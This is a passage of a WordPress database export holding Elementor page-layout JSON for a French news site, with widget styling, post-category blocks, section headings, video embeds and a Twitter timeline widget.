x\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p72uffi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"orderby\":\"name\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\",\"title_font_size\":{\"unit\":\"px\",\"size\":19},\"use_meta\":\"\",\"use_excerpt\":\"\",\"use_button\":\"\",\"content_half_mobile\":{\"unit\":\"px\",\"size\":270},\"content_half_2_mobile\":{\"unit\":\"px\",\"size\":300}},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"etkgpka\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"qhy9zif\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"rx702l4\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"1\",\"4\",\"5\",\"6\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1532,515,'_elementor_version','0.4'),(1534,516,'_elementor_edit_mode','builder'),(1535,516,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\